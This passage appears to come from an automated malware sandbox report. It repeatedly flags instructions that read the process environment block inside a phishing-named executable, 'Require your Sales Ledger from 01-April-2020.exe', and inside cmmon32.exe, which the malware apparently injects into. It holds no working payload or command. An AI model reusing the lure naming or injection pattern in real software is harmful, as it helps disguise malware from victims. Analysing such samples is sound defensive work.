Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0128C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01276CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01276CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01276CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0128FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0128FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C8F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01277794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01277794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01277794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01208794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012337F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012AFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01228E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012BAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012BAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012746A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0128FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012216E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012076E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01238EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012AFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012236CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C8ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D98CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D814FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D46CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D46CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D46CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D5C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D5C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D9740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D9740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D9740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D46DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D78DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CDD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CDD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D905AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D905AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D03D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D43540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D73D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D8E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D4A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D98D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CCAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D98ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D7FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D08EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D5FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D446A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D90EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D90EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D90EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D8AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D8AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CCC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CCC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CCC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D81608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D7FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CCE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D037F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D47794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D47794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D47794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CD8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CDEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CDFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D98F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D5FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D5FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D9070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D9070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CC4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CC4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D5B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CC58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CC40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CC40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CC40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CC9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D43884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D43884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D090AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D82073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D91074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D47016 mov eax, dword ptr fs:[00000030h]
